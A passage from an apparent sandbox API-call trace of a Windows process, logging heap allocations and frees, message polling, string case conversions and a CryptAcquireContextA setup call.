(HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa640 [0209.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0209.735] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0209.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0209.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0209.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0209.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0209.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0209.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0209.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0209.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0209.736] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0209.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0209.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0209.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0209.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0209.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0209.736] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0209.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0209.736] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0209.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0209.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0209.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0209.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0209.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0209.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0209.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0209.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0209.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0209.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0209.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0209.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0209.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0209.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0209.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0209.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0209.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0209.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0209.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0209.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0209.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0209.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0209.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0209.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0209.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.739] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0209.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0209.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0209.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0209.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0209.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0209.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0209.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0209.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0209.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0209.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0209.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0209.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0209.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0209.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0209.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0209.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0209.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e30, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0209.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0209.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0209.741] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0209.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0209.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0209.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e30, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0209.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0209.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0209.742] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0209.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0209.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a08 | out: hHeap=0x25c0000) returned 1 [0209.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0209.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0209.743] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad27a8) returned 1 [0209.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0209.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0209.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0209.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0209.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0209.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0209.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0209.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0209.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0209.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0209.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0209.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0209.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0209.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0209.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0209.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0209.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0209.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0209.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0209.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0209.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0209.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0209.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0209.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0209.746] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0209.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0209.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0209.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0209.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0209.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0209.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0209.746] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0209.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0209.746] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0209.747] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0209.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0209.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0209.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0209.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0209.747] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0209.747] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.747] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0209.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0209.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0209.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0209.747] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.747] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.748] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.748] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0209.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0209.748] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0209.748] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0209.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0209.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0209.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0209.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0209.748] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0209.748] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.748] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0209.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0209.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0209.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0209.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0209.749] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.749] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0209.749] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0209.749] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0209.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0209.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0209.749] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0209.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0209.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0209.750] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0209.750] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0209.750] 